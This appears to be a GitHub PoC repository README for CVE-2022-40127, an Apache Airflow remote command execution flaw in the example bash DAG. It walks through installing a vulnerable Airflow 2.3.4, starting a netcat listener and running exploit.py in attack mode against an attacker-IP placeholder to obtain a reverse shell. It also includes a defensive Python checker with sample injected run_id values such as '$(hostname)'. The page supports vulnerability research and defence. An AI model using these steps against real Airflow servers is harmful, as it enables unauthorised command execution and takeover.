
CVE-2022-40127 PoC — Apache Airflow <2.4.0 has an RCE in a bash example

Associated vulnerability
Title: Apache Airflow <2.4.0 has an RCE in a bash example (CVE-2022-40127)
Description: A vulnerability in the example DAGs of Apache Airflow allows an attacker with UI access who can trigger DAGs to execute arbitrary commands via a manually provided run_id parameter. This issue affects Apache Airflow versions prior to 2.4.0.
Repository description: CVE-2022-40127 PoC and exploit
# Apache Airflow < 2.4.0 RCE (CVE-2022-40127)

**PoC for CVE-2022-40127, an Apache Airflow RCE vulnerability affecting versions prior to 2.4.0.**

The <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40127" target="_blank">official report description</a> says:

> A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow versions prior to 2.4.0.

The repo is created for a CVE analysis blog post available on <a href="https://www.vicarius.io/vsociety/" target="_blank">vsociety blog</a>.

https://github.com/jakabakos/CVE-2022-40127/assets/42498816/2094f2ec-f074-41e6-99f4-f9f77dd09df6

## Usage
You can clone the repo:
```bash
git clone https://github.com/jakabakos/CVE-2022-40127.git
```

## Install and run Airflow v2.3.4

### Via docker-compose
Download the docker-compose file from the official repo:
```bash
cd /opt/
mkdir airflow-2.3.4 && cd airflow-2.3.4
curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.3.4/docker-compose.yaml'
```
Run Airflow:
```bash
mkdir -p ./dags ./logs ./plugins
echo -e "AIRFLOW_UID=$(id -u)" > .env
docker-compose up airflow-init
docker-compose up
open localhost:8080
```
In this case both the username and password will be `airflow`.

### Manually
Based on the <a href="https://airflow.apache.org/docs/apache-airflow/2.3.4/installation/installing-from-pypi.html" target="_blank">official install instructions</a>:
```bash
pip3.8 install "apache-airflow==2.3.4" --constraint "https://raw.githubusercontent.com/apache/airflow/constraints-2.3.4/constraints-3.7.txt"
```
You can verify if the installation was successful with commands `which airflow` and/or `airflow info`.

Run Airflow:
```bash
airflow standalone
```
See the generated password and username in the logs.


## Using the exploit

First, install the required packages with pip:
```bash
pip3 install -r requirements.txt
```
See the possible options with:
```bash
python3 exploit.py --help
```
Check whether the host is vulnerable (no attack is performed in this mode):
```bash
python3 exploit.py -u airflow -p airflow -url http://localhost:8080
```

Set up a local listener for the reverse shell in a different terminal session:
```bash
nc -lvnp 4242
```

Run the script in attack mode with this command:
```bash
python3 exploit.py -u airflow -p airflow -url http://localhost:8080 -a -host <attacker_ip> -port 4242
```
You should see the connection within a minute or so.
<img width="1549" alt="proof" src="https://github.com/jakabakos/CVE-2022-40127/assets/42498816/a80ff9ec-69a1-4b99-91ea-c244098ded80">
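The PoC above relies on two conditions that a defender can check without touching the exploit: the Airflow release is older than 2.4.0, and the bundled example DAGs are loaded. The block below is an added example, not code from the PoC repository or from the Airflow project. It parses an `airflow version` string, reads the `[core] load_examples` setting (honouring the `AIRFLOW__CORE__LOAD_EXAMPLES` environment override Airflow applies), and flags manually supplied `run_id` values that carry shell metacharacters, which Airflow-generated run ids never contain. The configuration text and run ids are constructed samples.

```python
"""Defensive triage helpers for CVE-2022-40127 (added example, not part of the PoC).

Assumptions (not from the page): the version string comes from `airflow version`
or the REST API, the config text is the [core] section of airflow.cfg, and run ids
come from the dag_run table or the audit log. All sample data below is constructed.
"""
import configparser
import re
from typing import Dict, List, Tuple

FIXED_VERSION = (2, 4, 0)  # CVE-2022-40127 is fixed from Airflow 2.4.0 onwards

# Characters that let text spliced into a bash command string leave its intended
# context. Airflow-generated run ids look like "manual__2022-09-01T10:00:00+00:00"
# or "scheduled__...", which never contain these, so their presence in a manually
# supplied run_id is worth an alert on any pre-2.4.0 deployment with examples on.
SHELL_META = re.compile(r"[;&|`$(){}<>\\'\"\n]")


def parse_version(text: str) -> Tuple[int, int, int]:
    """Parse the leading X.Y.Z of an Airflow version string."""
    m = re.match(r"\s*(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised Airflow version: {text!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3)))


def is_vulnerable_version(text: str) -> bool:
    """True for any release before the 2.4.0 fix."""
    return parse_version(text) < FIXED_VERSION


def examples_enabled(cfg_text: str, env: Dict[str, str]) -> bool:
    """Report whether example DAGs are loaded.

    The AIRFLOW__CORE__LOAD_EXAMPLES environment variable overrides airflow.cfg,
    and Airflow's own default for load_examples is True, so a missing key means
    the examples (and the vulnerable bash example DAG) are loaded.
    """
    value = env.get("AIRFLOW__CORE__LOAD_EXAMPLES")
    if value is None:
        cfg = configparser.ConfigParser()
        cfg.read_string(cfg_text)
        value = cfg.get("core", "load_examples", fallback="True")
    return value.strip().lower() in ("true", "1", "t", "yes", "y")


def suspicious_run_ids(run_ids: List[str]) -> List[str]:
    """Return run ids that carry shell metacharacters and deserve review."""
    return [r for r in run_ids if SHELL_META.search(r)]


# Constructed samples: the weak default configuration and its hardened form.
SAMPLE_CFG = """
[core]
load_examples = True
"""
HARDENED_CFG = SAMPLE_CFG.replace("True", "False")

# Constructed run ids: two Airflow-generated, one benign manual, two suspicious.
SAMPLE_RUN_IDS = [
    "manual__2022-09-01T10:00:00+00:00",
    "scheduled__2022-09-01T00:00:00+00:00",
    "release-42",
    "nightly;echo",
    "$(hostname)",
]

if __name__ == "__main__":
    print("2.3.4 vulnerable:", is_vulnerable_version("2.3.4"))
    print("examples enabled (default cfg):", examples_enabled(SAMPLE_CFG, {}))
    print("examples enabled (hardened cfg):", examples_enabled(HARDENED_CFG, {}))
    print("flagged run ids:", suspicious_run_ids(SAMPLE_RUN_IDS))
```

Setting `load_examples = False` (or `AIRFLOW__CORE__LOAD_EXAMPLES=false`) removes the example DAGs from the scheduler entirely, which closes this particular path even before upgrading; upgrading to 2.4.0 or later is still the real fix, and the run id check is only a signal for after-the-fact review of who triggered what.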

File Snapshot

```
[4.0K] /data/pocs/d6ab31e156c6b3ae34db80606a6d58385b5a184d
├── [6.0K] exploit.py
├── [4.0K] proofs
│   ├── [234K] flowchart.png
│   ├── [6.0M] proof.mp4
│   └── [380K] proof.png
├── [2.6K] README.md
└── [  27] requirements.txt

1 directory, 6 files
```